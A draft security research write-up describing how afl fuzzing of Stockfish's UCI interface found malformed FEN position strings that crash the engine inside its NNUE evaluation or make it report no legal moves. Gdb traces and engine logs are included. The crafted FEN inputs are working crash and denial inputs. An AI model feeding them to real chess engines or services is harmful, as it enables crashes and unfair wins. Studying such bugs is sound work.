Win by Segfault and other notes on Exploiting Chess Engines (Draft)

Sarah Jamie Lewis

We document a number of paths that can be used to exploit the Stockfish chess engine, causing crashes when attempting to evaluate the next best move, or even outright tricking the engine into believing it has no valid moves (while preserving the illusion to the interface that a valid game is being played).

Prelude

Universal Chess Interface (UCI) is an open communication protocol that enables chess engines to communicate with user interfaces. It is supported by practically every chess engine, and it is the interface through which we will be hooking our fuzzer.

Stockfish

Stockfish is an open source chess engine and is consistently ranked high in chess-engine rating lists. Stockfish is commonly bundled in engine-based chess applications and also used as the base for many derivitive engines.

Forsyth–Edwards Notation (FEN)

Positions are set up in chess engines over UCI using the position command. One variant of this is the position fen command that uses a format known as Forsyth–Edwards Notation, or FEN for short

Here is the FEN for the starting position in standard chess:

rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1

From left to right, we start with the piece position in each rank starting from rank 8 (empty squares are denoted by a number), then the active color (in this case w for white), then fields relating to castling and en-passant and then finally the number of half moves and full moves.

Displaying the Game State

At the start of the UCI session sending the command d tells the engine to display the current setup:
d

 +---+---+---+---+---+---+---+---+
 | r | n | b | q | k | b | n | r | 8
 +---+---+---+---+---+---+---+---+
 | p | p | p | p | p | p | p | p | 7
 +---+---+---+---+---+---+---+---+
 |   |   |   |   |   |   |   |   | 6
 +---+---+---+---+---+---+---+---+
 |   |   |   |   |   |   |   |   | 5
 +---+---+---+---+---+---+---+---+
 |   |   |   |   |   |   |   |   | 4
 +---+---+---+---+---+---+---+---+
 |   |   |   |   |   |   |   |   | 3
 +---+---+---+---+---+---+---+---+
 | P | P | P | P | P | P | P | P | 2
 +---+---+---+---+---+---+---+---+
 | R | N | B | Q | K | B | N | R | 1
 +---+---+---+---+---+---+---+---+
   a   b   c   d   e   f   g   h

Fen: rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1
Key: 8F8F01D4562F59FB
Checkers: 

As you can see it displays the board setup graphically, the Fen string associated with the board, a key (used in hash tables for pre-computing moves), and any possible checking pieces.

Opening Moves

Getting starting with fuzzing the UCI is relatively simple. Most engines accept input on stdin, and most off-the-shelf fuzzers support fuzzing over stdin. We can start with perhaps the most common open source fuzzer available today, afl.

We compile the latest Stockfish from source, substituting gcc/g++ with their afl siblings (this allows us to instrument the app and makes fuzzing more efficient, but as we will soon see this wasn't really necessary)

We construct a very simple input file:

    setoption name Skill Level value 6
    set position fen rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1
    d

Even with this simple setup we can find crashes almost immediately...

The Middlegame

It turns out the the FEN parser is a pretty big area of vulnerability in Stockfish. Stockfish will crash often when given fuzzed FEN inputs. Most of these crashes are, however, uninteresting. Crashing the engine before it has started the game doesn't provide any opportunities for winning the game, and as it turns out we can do better...

We first need to adjust out inputs, we need the engine to be doing more things such that it creates more opportunities for exploitation, enter the go command.

    setoption name Skill Level value 6
    set position fen rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1
    d
    go depth 5

go tells the engine to think about the next move, and come up with a solution. There are various parameters like infinite and depth that allows us to tweak how long it will think for and how many moves it will consider. It is also worth noting that fuzzing this interface will create many, many false positives (in particular false unique hang bugs - because the engine will be doing work, and the fuzzing session sometimes mistakes this for us having tricked the program into an infinite loop) - but these can be safely ignored.

We being our fuzzing session again, and after many, many hours, we hit a bug that looks more interesting...a crash that occurs after a call to go

Checking this out in gdb indicates that the crash happens deep inside NNUE

Eval::NNUE::FeatureTransformer::UpdateAccumulator (c=BLACK, pos=..., this=0x7fffee800000) at nnue/nnue_feature_transformer.h:379
379               acc[k] = vec_add_16(acc[k], column[k]);

NNUE (reversed EUNN for Efficiently Updatable Neural Network) is a core part of Stockfish and provides the intelligence that makes it such a strong engine. It seems as if we have a viable path into the core evaluation functions of Stockfish, and it's time to see if we can use that to gain some advantage over the machine.

The Endgame

So, what input did we find that made it all the way into Stockfish's neural network? (Note: this input has been cleaned up to remove fuzzing artifacts not relevant to the bug)

position fen 4kb1r/p2rqppp/5n2B2p1B1/4P3/1Q6/PPP2PPP/2K4R w - -
d
go searchmoves

What happens when we given this information to Stockfish?

Stockfish 291120 by the Stockfish developers (see AUTHORS file)
position fen 4kb1r/p2rqppp/5n2B2p1B1/4P3/1Q6/PPP2PPP/2K4R w - -
d

    +---+---+---+---+---+---+---+---+
    |   |   |   |   | k | b |   | r | 8
    +---+---+---+---+---+---+---+---+
    | B |   |   | p | q | B | p | p | 7
    +---+---+---+---+---+---+---+---+
    |   |   |   | P |   | n |   |   | 6
    +---+---+---+---+---+---+---+---+
    | Q |   |   |   |   |   |   |   | 5
    +---+---+---+---+---+---+---+---+
    | P | P |   |   | P | P | P |   | 4
    +---+---+---+---+---+---+---+---+
    |   | K |   |   |   |   | R | P | 3
    +---+---+---+---+---+---+---+---+
    |   |   |   |   |   |   |   |   | 2
    +---+---+---+---+---+---+---+---+
    |   |   |   |   |   |   |   |   | 1
    +---+---+---+---+---+---+---+---+
    a   b   c   d   e   f   g   h

Fen: 4kb1r/B2pqBpp/3P1n2/Q7/PP2PPP1/1K4RP/8/8 w - - 0 1
Key: 2CCEE92BEE2FC8B8
Checkers: f7
go searchmoves
info string NNUE evaluation using nn-62ef826d1a6d.nnue enabled
info depth 1 seldepth 1 multipv 1 score cp 801 nodes 31 nps 31000 tbhits 0 time 1 pv f7d5
info depth 2 seldepth 2 multipv 1 score cp 740 nodes 72 nps 72000 tbhits 0 time 1 pv f7d5 e7d6
info depth 3 seldepth 3 multipv 1 score cp 405 nodes 171 nps 171000 tbhits 0 time 1 pv f7d5 e7d6 h3h4 f6d5 e4d5
info depth 4 seldepth 4 multipv 1 score cp 556 nodes 206 nps 206000 tbhits 0 time 1 pv f7d5 e7d6 d5c4
info depth 5 seldepth 5 multipv 1 score cp 677 nodes 288 nps 144000 tbhits 0 time 2 pv f7d5 e7d6 a7e3
info depth 6 seldepth 7 multipv 1 score cp 787 nodes 442 nps 221000 tbhits 0 time 2 pv f7d5 e7d6 a7c5
info depth 7 seldepth 8 multipv 1 score cp 865 nodes 645 nps 322500 tbhits 0 time 2 pv f7d5 e7d6 a7c5
info depth 8 seldepth 12 multipv 1 score cp 990 nodes 1013 nps 337666 tbhits 0 time 3 pv f7d5 f6d5 d6e7
info depth 9 seldepth 12 multipv 1 score cp 912 nodes 3879 nps 646500 tbhits 0 time 6 pv f7d5 e7d6 a7c5 d6b8 d5c4 f8c5 a5c5 b8f4
info depth 10 seldepth 15 multipv 1 score cp 878 nodes 7305 nps 664090 tbhits 0 time 11 pv f7d5 e7d6 g3c3 d6b4 a5b4 f8b4 c3c8 e8e7 c8h8 b4d6 a7b8 d6c5 a4a5
info depth 11 seldepth 20 multipv 1 score cp 873 nodes 12643 nps 743705 tbhits 0 time 17 pv f7d5 e7d6 a7c5 d6c5 a5a8 e8e7 b4c5 f6d5 a8d5 h7h6 g3d3 e7f6 d5d4 f6g6 f4f5 g6h7
fish: Job 2, “./stockfish” terminated by signal SIGSEGV (Address boundary error)

There is much to unpack, so let's start with a few obvious points. The FEN string is very invalid: position fen 4kb1r/p2rqppp/5n2B2p1B1/4P3/1Q6/PPP2PPP/2K4R w - -. Rank 3 (5n2B2p1B1 encodes 15 pieces!

However it gets interpreted as 4kb1r/B2pqBpp/3P1n2/Q7/PP2PPP1/1K4RP/8/8 w - - 0 1 which stockfish considers valid enough to proceed with examining.

Those with a keen eye will have noted that the derived FEN is technically illegal, black is checked by Bishop on f7 and so it cannot be whites turn. However, instead of returning no valid moves Stockfish instead suggests possible moves up to a given depth, at which point it crashes deep inside its neural network.

The structure of this bug is relatively simple, the FEN parser is over-liberal and allows us to structure games in such a way that Stockfish becomes confused about the nature of the game. Our next goal is to see if we can we develop this exploit further?

Different Games Depending on who is Playing

Consider the inputs position fen 4kb1r/p2rqpp1Q6/PPP2PPP/2K4R w k and position fen 4kb1r/p2rqpp1Q6/PPP2PPP/2K4R b k, both are almost-identical (malicious) FEN positions except for one indicates that it is whites turn to play and the other indicates that it is blacks turn to play.

What happens when Stockfish interprets these inputs?

Stockfish 291120 by the Stockfish developers (see AUTHORS file)
position fen 4kb1r/p2rqpp1Q6/PPP2PPP/2K4R w k
d

 +---+---+---+---+---+---+---+---+
 | Q |   |   |   | k | b |   | r | 8
 +---+---+---+---+---+---+---+---+
 | P | P |   | r | P | P | P |   | 7
 +---+---+---+---+---+---+---+---+
 |   | K |   |   |   |   | R | P | 6
 +---+---+---+---+---+---+---+---+
 |   |   |   |   |   |   |   |   | 5
 +---+---+---+---+---+---+---+---+
 |   |   |   |   |   |   |   |   | 4
 +---+---+---+---+---+---+---+---+
 |   |   |   |   |   |   |   |   | 3
 +---+---+---+---+---+---+---+---+
 |   |   |   |   |   |   |   |   | 2
 +---+---+---+---+---+---+---+---+
 |   |   |   |   |   |   |   |   | 1
 +---+---+---+---+---+---+---+---+
   a   b   c   d   e   f   g   h

Fen: Q3kb1r/PP1rPPP1/1K4RP/8/8/8/8/8 w k - 0 1
Key: A5C501AF3C69574F
Checkers: a7 
go searchmoves
.....
info depth 30 seldepth 8 multipv 1 score mate 4 nodes 25542 nps 1216285 tbhits 0 time 21 pv b6c6 d7d6 g6d6 e8f7 e7f8q h8f8 g7f8q
fish: Job 3, “./stockfish” terminated by signal SIGSEGV (Address boundary error)
Stockfish 291120 by the Stockfish developers (see AUTHORS file)
position fen 4kb1r/p2rqpp1Q6/PPP2PPP/2K4R b k
d

 +---+---+---+---+---+---+---+---+
 | Q |   |   |   | k | b |   | r | 8
 +---+---+---+---+---+---+---+---+
 | P | P |   | r | P | P | P |   | 7
 +---+---+---+---+---+---+---+---+
 |   | K |   |   |   |   | R | P | 6
 +---+---+---+---+---+---+---+---+
 |   |   |   |   |   |   |   |   | 5
 +---+---+---+---+---+---+---+---+
 |   |   |   |   |   |   |   |   | 4
 +---+---+---+---+---+---+---+---+
 |   |   |   |   |   |   |   |   | 3
 +---+---+---+---+---+---+---+---+
 |   |   |   |   |   |   |   |   | 2
 +---+---+---+---+---+---+---+---+
 |   |   |   |   |   |   |   |   | 1
 +---+---+---+---+---+---+---+---+
   a   b   c   d   e   f   g   h

Fen: Q3kb1r/PP1rPPP1/1K4RP/8/8/8/8/8 b k - 0 1
Key: 0530210BF5930C83
Checkers: e7 f7 a8 
go searchmoves
info string NNUE evaluation using nn-62ef826d1a6d.nnue enabled
info depth 0 score mate 0
bestmove (none)

Despite the derived board being the same (illegal) setup, the Checkers field is inconsistent (and incorrect). It is as if Stockfish is using pieces in the original (malicious) input in its analysis of pieces that are checking. In the case of a black move there is piece on e7 checking, and in the white case there is no a7 piece checker either. One input, two very different interpretations and results.

Putting it all Together

We now have the pieces necessary (pardon the pun), to attempt to construct a somewhat realistic attack on Stockfish, a FEN parser that accepts a wide range of potentially malicious inputs, that will potentially allows us to craft a game specifically for Stockfish. That input will get interpreted by Stockfish in ways that we can control - as we have already seen there are a myriad of ways we can trigger a crash inside the neural network when Stockfish attempts to evaluate the next move, but we can actually do something a little more insidious - convince Stockfish that it has no valid moves to play.

Let us consider, the following position (black to play), black is in check by the pawn on d7, but can take to get out of check (Kxd7 or e8d7).

Such a game can be encoded as 4kb1r/p1PPPppp/4RPPP/7K/8/8/8/8 b k - 0 1, this game is legal.

Under normal operation, Stockfish has no problem finding the next best move for black:

Stockfish 291120 by the Stockfish developers (see AUTHORS file)
position fen 4kb1r/p1PPPppp/4RPPP/7K/8/8/8/8 b k - 0 1
d

 +---+---+---+---+---+---+---+---+
 |   |   |   |   | k | b |   | r | 8
 +---+---+---+---+---+---+---+---+
 | p |   | P | P | P | p | p | p | 7
 +---+---+---+---+---+---+---+---+
 |   |   |   |   | R | P | P | P | 6
 +---+---+---+---+---+---+---+---+
 |   |   |   |   |   |   |   | K | 5
 +---+---+---+---+---+---+---+---+
 |   |   |   |   |   |   |   |   | 4
 +---+---+---+---+---+---+---+---+
 |   |   |   |   |   |   |   |   | 3
 +---+---+---+---+---+---+---+---+
 |   |   |   |   |   |   |   |   | 2
 +---+---+---+---+---+---+---+---+
 |   |   |   |   |   |   |   |   | 1
 +---+---+---+---+---+---+---+---+
   a   b   c   d   e   f   g   h

Fen: 4kb1r/p1PPPppp/4RPPP/7K/8/8/8/8 b k - 0 1
Key: D16F5C3E2F9FABD3
Checkers: d7 
go searchmove
....
bestmove e8d7 ponder e7e8q

Now consider the input position fen 4kb1r/p2rqppp/5PPP2PPP/2K4R b k

Stockfish 291120 by the Stockfish developers (see AUTHORS file)
position fen 4kb1r/p2rqppp/5PPP2PPP/2K4R b k
d

 +---+---+---+---+---+---+---+---+
 |   |   |   |   | k | b |   | r | 8
 +---+---+---+---+---+---+---+---+
 | p |   | P | P | P | p | p | p | 7
 +---+---+---+---+---+---+---+---+
 |   |   |   |   | R | P | P | P | 6
 +---+---+---+---+---+---+---+---+
 |   |   |   |   |   |   |   | K | 5
 +---+---+---+---+---+---+---+---+
 |   |   |   |   |   |   |   |   | 4
 +---+---+---+---+---+---+---+---+
 |   |   |   |   |   |   |   |   | 3
 +---+---+---+---+---+---+---+---+
 |   |   |   |   |   |   |   |   | 2
 +---+---+---+---+---+---+---+---+
 |   |   |   |   |   |   |   |   | 1
 +---+---+---+---+---+---+---+---+
   a   b   c   d   e   f   g   h

Fen: 4kb1r/p1PPPppp/4RPPP/7K/8/8/8/8 b k - 0 1
Key: D16F5C3E2F9FABD3
Checkers: d7 e7 

Note how our malicious input encodes to our considered game 4kb1r/p1PPPppp/4RPPP/7K/8/8/8/8 b k - 0 1. However, there is one big difference, Stockfish thinks that the black king is in check twice, on d7 AND on e7.

When we attempt to use stockfish to find the next best move, Stockfish fails:

go searchmove
info string NNUE evaluation using nn-62ef826d1a6d.nnue enabled
info depth 0 score mate 0
bestmove (none)

We have successfully tricked Stockfish into confusion.

Epilogue

Is any of this practical? Can you actually use any of the exploits documented here to win a game of Chess?

To exploit these vulnerabilities requires that the chess engine accept, mid game, the state of the game in FEN format ( or some other format that contains our poisoned FEN string).

Is this likely? Not really, but it certainly isn't beyond the realm of possibility - adjournments used to be a common part of chess and are still occasionally invoked, machine restarts do happen (and thus the machine must be seeded with the most recent game state), and there is a thriving community of players who play over days, weeks or months with the aid of engines and portable game formats...such an attack vector is, at least for the sake of argument,not impossible. (see also #KingMe Attack)

More realistically, this has been a fun academic study on the nature of artificial intelligence and an exploration in how machines can be tricked to gain an advantage.

Other Notes and References

Win by Segfault Attack

After building a better fuzzing corpus out of chess puzzles I now have an example of a spiked FEN attack which constructs FEN containing a legal board setup and that segfaults during analysis. The crash is not always consistent, but happens roughly 1/2 the time (100% in a debugger)

position fen r1b2rk1pn1/7n/4o3/6Qq/2BB4/pPP2PPP/R5K1 b - - 1 0
d
+---+---+---+---+---+---+---+---+
| r |   | n |   |   | r | k |   | 8
+---+---+---+---+---+---+---+---+
|   |   |   |   |   |   |   |   | 7
+---+---+---+---+---+---+---+---+
| Q | q |   |   |   |   |   |   | 6
+---+---+---+---+---+---+---+---+
|   |   |   |   |   |   |   |   | 5
+---+---+---+---+---+---+---+---+
| P | P |   |   | B | B |   |   | 4
+---+---+---+---+---+---+---+---+
| K |   | p | P | P |   |   | P | 3
+---+---+---+---+---+---+---+---+
|   |   | R |   |   |   |   |   | 2
+---+---+---+---+---+---+---+---+
|   |   |   |   |   |   |   |   | 1
+---+---+---+---+---+---+---+---+
a   b   c   d   e   f   g   h

Fen: r1n2rk1/8/Qq6/8/PP2BB2/K1pPP2P/2R5/8 b - - 1 1
Key: 3E7AABA0F8324B04
Checkers:
go depth 10
info string NNUE evaluation using nn-62ef826d1a6d.nnue enabled
info depth 1 seldepth 1 multipv 1 score cp -666 nodes 302 nps 302000 tbhits 0 time 1 pv f8f4 a6b6 c8b6 e3f4 a8a4 a3b3
info depth 2 seldepth 2 multipv 1 score cp -794 nodes 352 nps 352000 tbhits 0 time 1 pv g8g7 a6b6
info depth 3 seldepth 3 multipv 1 score cp -903 nodes 491 nps 245500 tbhits 0 time 2 pv f8f7 a6b6 c8b6
info depth 4 seldepth 4 multipv 1 score cp -947 nodes 942 nps 471000 tbhits 0 time 2 pv b6c7 f4c7 a8a6
info depth 5 seldepth 5 multipv 1 score cp -911 nodes 1141 nps 570500 tbhits 0 time 2 pv g8h8 a6b6 c8b6

Thread 2 "stockfish" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff722f700 (LWP 2540040)]
Eval::NNUE::FeatureTransformer::UpdateAccumulator (c=BLACK, pos=..., this=0x7fffee800000) at nnue/nnue_feature_transformer.h:379
379               acc[k] = vec_add_16(acc[k], column[k]);

Peter Bindels found that the derived FEN above can be arrived at through the following sequence of legal moves: d3 c5 Bf4 d5 e3 e5 Qh5 g5 Qxg5 f5 Qxf5 c4 b4 c3 a4 Qe7 Qxe5 Bf5 Qxd5 Bh6 Qxf5 Qe6 Qxh7 Ne7 Qxh6 Nc8 Qg7 Nc6 Qxb7 Nd4 Qxa7 O-O Qa6 Nxc2+ Kd1 Nd4 Be2 Nf3 Bxf3 Qb6 Be4 Qg6 Nd2 Qxg2 Kc2 Qxf2 Ngf3 Qxf3 Rhf1 Qxf1 Rc1 Qh3 Kb3 Qh6 Nc4 Qc6 Nb6 Qxb6 Rc2 Qc6 Ka3 Qb6 h3 . Showing that the derived FEN is a valid (though unlikely) board setup.